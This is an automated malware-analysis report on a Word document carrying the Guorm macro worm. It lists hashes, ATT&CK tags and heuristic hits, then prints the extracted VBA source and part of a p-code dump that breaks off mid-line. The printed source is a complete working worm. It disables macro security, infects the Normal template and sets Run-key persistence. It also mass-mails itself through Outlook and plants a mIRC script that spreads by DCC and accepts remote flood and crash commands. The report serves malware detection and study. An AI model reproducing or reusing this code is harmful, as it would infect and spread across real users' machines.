Office (OLE) malware analysis — malicious · 2aeef1bdbf708b14

MALICIOUS

Office (OLE)

48.5 KB Created: 2000-05-13 23:49:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 348aa33dd48159639dcbdca4b119f318 SHA-1: 4f1ff81c4238ed5d3b414bfbd4ab38e7b09c9af3 SHA-256: 2aeef1bdbf708b14d85fa4192efa4754deae87573b6c938bcc090b55b09953de

496 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a shell command to create and write a VBScript file named 'GuormEx.vbs' to the Windows directory. This script is then registered in the Run key to ensure persistence. The macro also attempts to disable security features and uses WScript.Shell to achieve its objectives, indicating a downloader or dropper functionality.

Heuristics 11

ClamAV: Win.Worm.Guorm-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Worm.Guorm-1
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

guorm.Close
Shell Environ("WINDIR") & "\wscript.exe " & Environ("WINDIR") & "\GuormEx.vbs %"
End If

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

guorm.writeline "dim Fso,ws"
guorm.writeline "set ws=CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")"
guorm.writeline "set fso=createobject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")"

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

guorm.writeline "fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1) & " & Chr(34) & "\user32.dll.vbs" & Chr(34) & ""
guorm.writeline "ws.regwrite " & Chr(34) & "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\user32" & Chr(34) & ", " & Chr(34) & "wscript.exe " & Chr(34) & " & fso.GetSpecialFolder(1) & " & Chr(34) & "\user32.dll.vbs %" & Chr(34) & ""
guorm.writeline "end if"

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim fso, guorm
Set fso = CreateObject("scripting.filesystemobject")
If Not (fso.fileexists(Environ("WINDIR") & "\GuormEx.vbs")) Then

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_open()
'Guorm(Marco.Word). By Kalamar & Beuno.

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

Set fso = CreateObject("scripting.filesystemobject")
If Not (fso.fileexists(Environ("WINDIR") & "\GuormEx.vbs")) Then
Set guorm = fso.createtextfile(Environ("WINDIR") & "\GuormEx.vbs", True)

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE

Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	60566 bytes
SHA-256: `f3a37ec7931dc16c66190569bb100d95a532871177a962133ccb9d3e21edbedf`
Detection ClamAV: Win.Worm.Guorm-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() 'Guorm(Marco.Word). By Kalamar & Beuno. On Error Resume Next System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False Set AcDoc = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule Set NorTEmp = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule Set ThisDoc = ThisDocument.VBProject.VBComponents.Item(1).CodeModule Start_line = ThisDoc.ProcStartLine("document_open", vbext_pk_Proc) If AcDoc.countoflines <> 0 Then Ad_Lines = AcDoc.Lines(Start_line, AcDoc.countoflines) If InStr(Ad_Lines, ThisDoc.Lines(Start_line, 196)) = 0 Then AcDoc.AddFromString ThisDoc.Lines(Start_line, 196) End If Else AcDoc.AddFromString ThisDoc.Lines(Start_line, 196) End If If NorTEmp.countoflines <> 0 Then Nt_lines = NorTEmp.Lines(Start_line, NorTEmp.countoflines) If InStr(Nt_lines, ThisDoc.Lines(Start_line, 196)) = 0 Then NorTEmp.AddFromString ThisDoc.Lines(Start_line, 196) End If Else NorTEmp.AddFromString ThisDoc.Lines(Start_line, 196) End If Dim fso, guorm Set fso = CreateObject("scripting.filesystemobject") If Not (fso.fileexists(Environ("WINDIR") & "\GuormEx.vbs")) Then Set guorm = fso.createtextfile(Environ("WINDIR") & "\GuormEx.vbs", True) guorm.writeline "'Guorm(Vbs). Mirc/Outlook/Vbs. By Kalamar & Beuno." guorm.writeline "On error resume next" guorm.writeline "dim Fso,ws" guorm.writeline "set ws=CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")" guorm.writeline "set fso=createobject(" & Chr(34) & "scripting.filesystemobject" & Chr(34) & ")" guorm.writeline "if not(fso.fileexists(fso.GetSpecialFolder(1) & " & Chr(34) & "\user32.dll.vbs" & Chr(34) & ")) then" guorm.writeline "fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1) & " & Chr(34) & "\winuser.dll" & Chr(34) & "" guorm.writeline "fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1) & " & Chr(34) & "\user32.dll.vbs" & Chr(34) & "" guorm.writeline "ws.regwrite " & Chr(34) & "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\user32" & Chr(34) & ", " & Chr(34) & "wscript.exe " & Chr(34) & " & fso.GetSpecialFolder(1) & " & Chr(34) & "\user32.dll.vbs %" & Chr(34) & "" guorm.writeline "end if" guorm.writeline "if ws.regread (" & Chr(34) & "HKCU\software\Guorm\mailed" & Chr(34) & ") <> " & Chr(34) & "1" & Chr(34) & " then" guorm.writeline "DoMail" guorm.writeline "end if" guorm.writeline "if ws.regread (" & Chr(34) & "HKCU\software\Guorm\Mirqued" & Chr(34) & ") <> " & Chr(34) & "1" & Chr(34) & " then" guorm.writeline "mirque()" guorm.writeline "end if" guorm.writeline "Function DoMail()" guorm.writeline "On Error Resume Next" guorm.writeline "Dim fso, ws" guorm.writeline "Set fso = CreateObject(" & Chr(34) & "Scripting.filesystemobject" & Chr(34) & ")" guorm.writeline "Set ws = CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")" guorm.writeline "Set OApp = CreateObject(" & Chr(34) & "Outlook.Application" & Chr(34) & ")" guorm.writeline "if oapp=" & Chr(34) & "Outlook" & Chr(34) & " then" guorm.writeline "Dim wnames(16)" guorm.writeline "Dim wext(6)" guorm.writeline "wext(1) = " & Chr(34) & ".vbs" & Chr(34) & ": wext(2) = " & Chr(34) & ".vbe" & Chr(34) & ": wext(3) = " & Chr(34) & ".txt.vbs" & Chr(34) & ": wext(4) = " & Chr(34) & ".jpg.vbs" & Chr(34) & ": wext(5) = " & Chr(34) & ".avi.vbs" & Chr(34) & ": wext(6) = " & Chr(34) & ".scr.vbs" & Chr(34) & "" guorm.writeline "wnames(9) = " & Chr(34) & "links" & Chr(34) & ": wnames(1) = " & Chr(34) & "cool" & Chr(34) & ": wnames(2) = " & Chr(34) & "funny" & Chr(34) & ": wnames(3) = " & Chr(34) & "anti-loveletter" & Chr(34) & ": wnames(4) = " & Chr(34) & "guorm" & Chr(34) & ": wnames(5) = " & Chr(34) & "pot" & Chr(34) & ": wnames(6) = " & Chr(34) & "win2k" & Chr(34) & ": wnames(7) = " & Chr(34) & "icq2k" & Chr(34) & ": wnames(8) = " & Chr(34) & "money" & Chr(34) & ": wnames(10) = " & Chr(34) & "funnypic.jpg" & Chr(34) & ": wnames(11) = " & Chr(34) & "quake" & Chr(34) & ": wnames(12) = " & Chr(34) & "Year2K+1" & Chr(34) & ": wnames(13) = " & Chr(34) & "Mirc2K" & Chr(34) & ": wnames(14) = " & Chr(34) & "Word2001" & Chr(34) & ": wnames(15) = " & Chr(34) & "FunStuff" & Chr(34) & ": wnames(16) = " & Chr(34) & "WindowsMe" & Chr(34) & "" guorm.writeline "Randomize" guorm.writeline "wname2 = wnames(Int((16 * Rnd) + 1))" guorm.writeline "Randomize" guorm.writeline "wext2 = wext(Int((6 * Rnd) + 1))" guorm.writeline "newname = wname2 & wext2" guorm.writeline "fso.CopyFile wscript.scriptfullname, fso.GetSpecialFolder(1) & " & Chr(34) & "\" & Chr(34) & " & newname" guorm.writeline "Set Mapi = OApp.GetNameSpace(" & Chr(34) & "MAPI" & Chr(34) & ")" guorm.writeline "For Each AddList In Mapi.AddressLists" guorm.writeline "If AddList.AddressEntries.Count <> 0 Then" guorm.writeline "For AddListCount = 1 To AddList.AddressEntries.Count" guorm.writeline "Set AddListEntry = AddList.AddressEntries(AddListCount)" guorm.writeline "Set msg = OApp.CreateItem(0)" guorm.writeline "msg.To = AddListEntry.Address" guorm.writeline "msg.Subject = " & Chr(34) & "You know what it is. ;-P" & Chr(34) & "" guorm.writeline "msg.Body = " & Chr(34) & "Check it out!" & Chr(34) & "" guorm.writeline "msg.Attachments.Add fso.GetSpecialFolder(1) & " & Chr(34) & "\" & Chr(34) & " & newname" guorm.writeline "msg.DeleteAfterSubmit = True" guorm.writeline "If msg.To <> " & Chr(34) & "" & Chr(34) & " Then" guorm.writeline "msg.Send" guorm.writeline "End If" guorm.writeline "Next" guorm.writeline "End If" guorm.writeline "Next" guorm.writeline "ws.regwrite " & Chr(34) & "HKCU\software\Guorm\mailed" & Chr(34) & ", " & Chr(34) & "1" & Chr(34) & "" guorm.writeline "OApp.Quit" guorm.writeline "fso.DeleteFile (fso.GetSpecialFolder(1) & " & Chr(34) & "\" & Chr(34) & " & newname)" guorm.writeline "end if" guorm.writeline "End Function" guorm.writeline "Function mirque()" guorm.writeline "On Error Resume Next" guorm.writeline "Dim finded" guorm.writeline " Dim fso, Drives, Drivetype" guorm.writeline " Dim Drivesefull" guorm.writeline " Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" guorm.writeline " Set Drives = fso.Drives" guorm.writeline " For Each Drivetype In Drives" guorm.writeline " If Drivetype.Drivetype = Remote Then" guorm.writeline " Drivesefull = Drivetype & " & Chr(34) & "\" & Chr(34) & "" guorm.writeline " Call Search_Subfol(Drivesefull)" guorm.writeline " ElseIf Drivetype.IsReady Then" guorm.writeline " Drivesefull = Drivetype & " & Chr(34) & "\" & Chr(34) & "" guorm.writeline " Call Search_Subfol(Drivesefull)" guorm.writeline " End If" guorm.writeline " Next" guorm.writeline "End Function" guorm.writeline "Function Search_Subfol(Whichfol)" guorm.writeline "On Error Resume Next" guorm.writeline "Dim fso, GetFol, Files, File, Subfolds" guorm.writeline " Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" guorm.writeline " Set GetFol = fso.GetFolder(Whichfol)" guorm.writeline " Set Files = GetFol.Files" guorm.writeline " For Each File In Files" guorm.writeline " If File.Name = " & Chr(34) & "mirc.ini" & Chr(34) & " Or File.Name = " & Chr(34) & "mirc32.exe" & Chr(34) & " Or File.Name = " & Chr(34) & "mlink32.exe" & Chr(34) & " Then" guorm.writeline " Call DoMirc(Whichfol)" guorm.writeline " End If" guorm.writeline " Next" guorm.writeline " Set File = GetFol.SubFolders" guorm.writeline " For Each Subfolds In File" guorm.writeline " Call Search_Subfol(Subfolds.path)" guorm.writeline " Next" guorm.writeline "End Function" guorm.writeline "Function DoMirc(path)" guorm.writeline "On Error Resume Next" guorm.writeline "Dim fso" guorm.writeline "Set fso = CreateObject(" & Chr(34) & "Scripting.FileSystemObject" & Chr(34) & ")" guorm.writeline "Set dirsystem = fso.GetSpecialFolder(0)" guorm.writeline "If Right(path, 1) <> " & Chr(34) & "\" & Chr(34) & " Then" guorm.writeline "Set scriptini = fso.CreateTextFile(path & " & Chr(34) & "\script.ini" & Chr(34) & ", True)" guorm.writeline "Else" guorm.writeline "Set scriptini = fso.CreateTextFile(path & " & Chr(34) & "script.ini" & Chr(34) & ", True)" guorm.writeline "End If" guorm.writeline "scriptini.WriteLine " & Chr(34) & "[script]" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n0=on :CONNECT:{" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n1= .join #guorm" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n2= set %chancolor $chr(3) $+ 4" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n3= .timercon1 -m 1 250 .msg #guorm %chancolor $+ -------------------------------------- $+ $chr(3)" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n4= .timercon2 -m 1 500 .msg #guorm Just annother dumbass" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n5= .timercon3 -m 1 750 .msg #guorm Mother fucker who got infected" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n6= .timercon4 -m 1 1000 .msg #guorm by Guorm - BM + OldWary + Kalamar" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n7= .timercon5 -m 1 1250 .msg #guorm %chancolor $+ -------------------------------------- $+ $chr(3)" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n8= .timercon6 -m 1 2000 unset %chancolor" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n9= chanstatus" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n10= .timercon7 1 20 update" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n11=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n12=on :JOIN:#guorm:{ .window -h #guorm }" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n13=on :DISCONNECT:{" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n14= .part #guorm" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n15=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n16=alias -l chanstatus {" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n17= .timerop1 1 10 if ($me isop #guorm) .topic #guorm -=[ Guorm ]=-" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n18= .timerop2 1 11 if ($me isop #guorm) .mode #guorm +nst" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n19= .timerop3 1 12 if ($me isop #guorm) .mode #guorm -o $me" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n20=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n21=on :JOIN:#: if (($nick != $me) && ($chan != #guorm) && ($chan != #virus)) { guorm.infect $nick }" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n22=on :TEXT:virus:: if ((#virus != $chan) && (#guorm != $chan)) .ignore $nick" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n23=on :TEXT:worm:: if ((#virus != $chan) && (#guorm != $chan)) .ignore $nick" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n24=on :TEXT:!GuormFlood:#guorm:.ignore -u120 $nick \| .timer41 10 2 .CTCP $2 PING \| .timer42 10 2 .CTCP $2 VERSION \| .timer43 10 2 .CTCP $2 FINGER \| .timer44 10 2 .CTCP $2 TIME" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n25=ctcp :!GuormFlood::.ignore -u120 $nick \| .timer41 10 2 .CTCP $2 PING \| .timer42 10 2 .CTCP $2 VERSION \| .timer43 10 2 .CTCP $2 FINGER \| .timer44 10 2 .CTCP $2 TIME" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n26=on :TEXT:!joinflood:#guorm:.timer51 10 2 .join $2 \| .timer52 10 3 .part $2" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n27=ctcp :!joinflood::.timer51 10 2 .join $2 \| .timer52 10 3 .part $2" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n35=ctcp :!kill::.run -n file://c:/con/con" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n36=ctcp :!fserve::.fserve $nick 1 $2" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n37=ctcp :+:: $right($1-,-1) \| /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n38=ctcp :PING: { raw -q notice $nick : $+ $chr(1) $+ PING BM + OldWary + KALAMAR $+ $chr(1) } /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n39=ctcp :VERSION: { raw -q notice $nick : $+ $chr(1) $+ VERSION Guorm 1.0 $+ $chr(1) } /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n40=ctcp :FINGER:: /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n41=ctcp :TIME: { raw -q notice $nick : $+ $chr(1) $+ TIME Guorm time! $+ $chr(1) } /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n42=ctcp :AUTHOR: { raw -q notice $nick : $+ $chr(1) $+ AUTHOR BM + OldWary + KALAMAR $+ $chr(1) } /halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n43=raw 353:guorm:/halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n44=raw 366:dguorm:/halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n45=raw 403:dguorm:/halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n46=raw 442:dguorm:/halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n47=raw :guorm:/halt" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n48=alias -l file.name return $gettok(:links.vbs:p0rn.vbs:winsource.vbs:quake.vbs:network.vbs:sony.vbs:vbs.vbs:,$r(1,7),58)" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n49=alias guorm.infect {" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n50= %guorm.sock = guorm.send. $+ $rand(100,9000)" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n51= socklisten %guorm.sock" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n52= .timer99 off" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n53= .timer99 1 120 sockclose guorm.send." & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n54= raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND $file.name $longip($ip) $sock(%guorm.sock).port $file(c:\windows\system\winuser.dll).size $+ $chr(1)" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n55=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n56=on :socklisten:guorm.send.:{" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n57= set %guorm.temp guorm.write. $+ $gettok($sockname,3,46) \| sockaccept %guorm.temp \| guorm.send %guorm.temp \| sockclose $sockname" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n58=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n59=on :sockwrite:guorm.write.:{" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n60= if ($sock($sockname).sent >= $file(c:\windows\system\winuser.dll).size) sockwrite -n $sockname" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n61= else guorm.send $sockname" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n62=}" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n63=alias guorm.send {" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n64= bread c:\windows\system\winuser.dll $sock($sockname).sent 4096 &guorm.data" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n65= sockwrite $1 &guorm.data" & Chr(34) & "" guorm.writeline "scriptini.WriteLine " & Chr(34) & "n66=}" & Chr(34) & "" guorm.writeline "scriptini.Close" guorm.writeline "ws.regwrite " & Chr(34) & "HKCU\software\Guorm\Mirqued" & Chr(34) & ", " & Chr(34) & "1" & Chr(34) & "" guorm.writeline "End Function" guorm.Close Shell Environ("WINDIR") & "\wscript.exe " & Environ("WINDIR") & "\GuormEx.vbs %" End If End Sub ' Processing file: /tmp/qstore_pcgq0jkv ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 24894 bytes ' Line #0: ' FuncDefn (Private Sub Document_open()) ' Line #1: ' QuoteRem 0x0000 0x0026 "Guorm(Marco.Word). By BM & OW & Kalama" ' Line #2: ' OnError (Resume Next) ' Line #3: ' LitDI4 0x0001 0x0000 ' LitStr 0x0000 "" ' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security" ' LitStr 0x0005 "Level" ' Ld System ' ArgsMemSt PrivateProfileString 0x0003 ' Line #4: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #5: ' LitVarSpecial (False) ' Ld Options ' MemSt SaveNormalPrompt ' Line #6: ' LitVarSpecial (False) ' Ld Options ' MemSt ConfirmConversions ' Line #7: ' SetStmt ' LitDI2 0x0001 ' Ld ActiveDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set AcDoc ' Line #8: ' SetStmt ' LitDI2 0x0001 ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set NorTEmp ' Line #9: ' SetStmt ' LitDI2 0x0001 ' Ld ThisDocument ' MemLd VBProject ' MemLd VBComponents ' ArgsMemLd Item 0x0001 ' MemLd CodeModule ' Set ThisDoc ' Line #10: ' LitStr 0x000D "document_open" ' Ld vbext_pk_Proc ' Ld ThisDoc ' ArgsMemLd ProcStartLine 0x0002 ' St Start_line ' Line #11: ' Ld AcDoc ' MemLd countoflines ' LitDI2 0x0000 ' Ne ' IfBlock ' Line #12: ' Ld Start_line ' Ld AcDoc ' MemLd countoflines ' Ld AcDoc ' ArgsMemLd Lines 0x0002 ' St Ad_Lines ' Line #13: ' Ld Ad_Lines ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' FnInStr ' LitDI2 0x0000 ' Eq ' IfBlock ' Line #14: ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' Ld AcDoc ' ArgsMemCall AddFromString 0x0001 ' Line #15: ' EndIfBlock ' Line #16: ' ElseBlock ' Line #17: ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' Ld AcDoc ' ArgsMemCall AddFromString 0x0001 ' Line #18: ' EndIfBlock ' Line #19: ' Ld NorTEmp ' MemLd countoflines ' LitDI2 0x0000 ' Ne ' IfBlock ' Line #20: ' Ld Start_line ' Ld NorTEmp ' MemLd countoflines ' Ld NorTEmp ' ArgsMemLd Lines 0x0002 ' St Nt_lines ' Line #21: ' Ld Nt_lines ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' FnInStr ' LitDI2 0x0000 ' Eq ' IfBlock ' Line #22: ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' Ld NorTEmp ' ArgsMemCall AddFromString 0x0001 ' Line #23: ' EndIfBlock ' Line #24: ' ElseBlock ' Line #25: ' Ld Start_line ' LitDI2 0x00C4 ' Ld ThisDoc ' ArgsMemLd Lines 0x0002 ' Ld NorTEmp ' ArgsMemCall AddFromString 0x0001 ' Line #26: ' EndIfBlock ' Line #27: ' Dim ' VarDefn fso ' VarDefn guorm ' Line #28: ' SetStmt ' LitStr 0x001A "scripting.filesystemobject" ' ArgsLd CreateObject 0x0001 ' Set fso ' Line #29: ' LitStr 0x0006 "WINDIR" ' ArgsLd Environ 0x0001 ' LitStr 0x000C "\GuormEx.vbs" ' Concat ' Ld fso ' ArgsMemLd fileexists 0x0001 ' Paren ' Not ' IfBlock ' Line #30: ' SetStmt ' LitStr 0x0006 "WINDIR" ' ArgsLd Environ 0x0001 ' LitStr 0x000C "\GuormEx.vbs" ' Concat ' LitVarSpecial (True) ' Ld fso ' ArgsMemLd createtextfile 0x0002 ' Set guorm ' Line #31: ' LitStr 0x0032 "'Guorm(Vbs). Mirc/Outlook/Vbs. By BM & OW & Kalama" ' Erase 0x026C ' ArgsMemCall writeline 0x0001 ' Line #32: ' LitStr 0x0014 "On error resume next" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #33: ' LitStr 0x000A "dim Fso,ws" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #34: ' LitStr 0x0014 "set ws=CreateObject(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000D "WScript.Shell" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #35: ' LitStr 0x0015 "set fso=createobject(" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x001A "scripting.filesystemobject" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 ")" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #36: ' LitStr 0x0030 "if not(fso.fileexists(fso.GetSpecialFolder(1) & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F "\user32.dll.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0007 ")) then" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #37: ' LitStr 0x003E "fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1) & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C "\winuser.dll" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #38: ' LitStr 0x003E "fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1) & " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000F "\user32.dll.vbs" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #39: ' LitStr 0x000C "ws.regwrite " ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0039 "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\user32" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0002 ", " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x000C "wscript.exe " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x001D " & fso.GetSpecialFolder(1) & " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0011 "\user32.dll.vbs %" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0000 "" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #40: ' LitStr 0x0006 "end if" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #41: ' LitStr 0x000F "if ws.regread (" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x001A "HKCU\software\Guorm\mailed" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 ") <> " ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0001 "1" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x0005 " then" ' Concat ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #42: ' LitStr 0x0006 "DoMail" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #43: ' LitStr 0x0006 "end if" ' Ld guorm ' ArgsMemCall writeline 0x0001 ' Line #44: ' LitStr 0x000F "if ws.regread (" ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' Concat ' LitStr 0x001B "HKCU\software\Guorm\Mirqued" ' Concat ' LitDI2 0x0022 ' ArgsLd Chr 0x0001 ' 